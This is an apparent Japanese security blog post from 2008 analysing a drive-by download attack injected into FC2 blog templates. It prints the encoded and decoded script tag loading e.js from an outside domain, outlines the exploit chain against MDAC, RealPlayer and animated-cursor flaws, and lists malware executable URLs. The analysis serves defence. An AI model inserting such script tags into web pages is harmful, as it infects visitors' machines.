ハルコタン紀行

fccja.comその1

いくつかのFC2ブログのテンプレートに新たなscriptが仕込まれています。
<script language="javascript" src="http://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
デコードします。
<script language="javascript" src="http://www.fccja.com/e.js"></script>
language="javascript"ではなくtype="text/javascript"を使うべきです。

IPがhellh.netの隣なので結果はわかってはいますが、とりあえずwhoisします。
Creation Date:2008-03-20
Country:China

http://www.fccja.com/
に(iframeなどで)アクセスした場合でもDefault.htmは
<script language="javascript" src="http://www.fccja.com/e.js"></script>
となっており、e.jsが起点となっています。

e.jsはd1.asp、d2.asp、d3.aspを順にtry~catchします。
d1.asp、d2.asp、d3.aspが狙う脆弱性は順にMS06-014(MDAC)、RealPlayer、MS07-017(アニメーションカーソル)です。

Default.htm
→e.js
 →d1.asp (スクリプトその1)
 →d2.asp (スクリプトその2)
 →d3.asp (スクリプトその3)
スクリプトを全てASPにしており、2回目のアクセスでは何も返って来ません(Content-Length: 0)。
どうでもいいことですが、<div style="display:none">とスタイルシートで非表示にしています。

MS07-017はトロイを実行させる手法としては比較的ポピュラーですが、今までのdda3.netやhellh.netでは使われていませんでした。
細工されたファイル(ani等)をWindowsが触る(GDIが描画する)だけで発動するため、ブラウザは関係ありません。
WindowsUpdateしていれば阻止できます。

http://www.fccja.com/com.exe
VirusTotal


ついでに4日経過したhellh.netを再スキャン。
http://www.hellh.net/vip.exe
VirusTotal


遅くとも2日以内には対応してほしいものです。
対応した頃にはとっくに新種に置き換わっていた、では役に立ちません。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/23(日) 16:19:14|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0
<<fccja.comその2 | ホーム | hellh.netその4>>

コメント

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/12-0d4f6621
この記事にトラックバックする(FC2ブログユーザー)